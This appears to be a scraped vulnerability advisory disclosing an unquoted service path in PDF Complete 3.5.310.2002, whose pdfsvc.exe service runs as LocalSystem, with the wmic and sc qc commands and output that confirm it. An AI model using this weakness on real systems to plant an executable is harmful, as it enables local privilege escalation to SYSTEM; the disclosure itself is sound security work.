37 lines
No EOL
1.2 KiB
Text
37 lines
No EOL
1.2 KiB
Text
# Exploit Title: PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path
|
|
# Discovery by: Zaira Alquicira
|
|
# Discovery Date: 2020-12-10
|
|
# Vendor Homepage: https://pdf-complete.informer.com/3.5/
|
|
# Tested Version: 3.5.310.2002
|
|
# Vulnerability Type: Unquoted Service Path
|
|
# Tested on OS: Windows 10 Pro x64 es
|
|
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
C:\>wmic service get name, pathname, displayname, startmode | findstr /i
|
|
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "pdfsvc" | findstr /i /v
|
|
"""
|
|
|
|
PDF Complete
|
|
|
|
PDF Complete C:\Program Files (x86)\PDF Complete\pdfsvc.exe
|
|
/startedbyscm:66B66708-40E2BE4D-pdfcService
|
|
Auto
|
|
|
|
|
|
# Service info:
|
|
|
|
C:\Users\TOSHIBA>sc qc "pdfcDispatcher"
|
|
[SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: pdfcDispatcher
|
|
TIPO : 10 WIN32_OWN_PROCESS
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 1 NORMAL
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe
|
|
/startedbyscm:66B66708-40E2BE4D-pdfcService
|
|
GRUPO_ORDEN_CARGA :
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : PDF Document Manager
|
|
DEPENDENCIAS :
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem |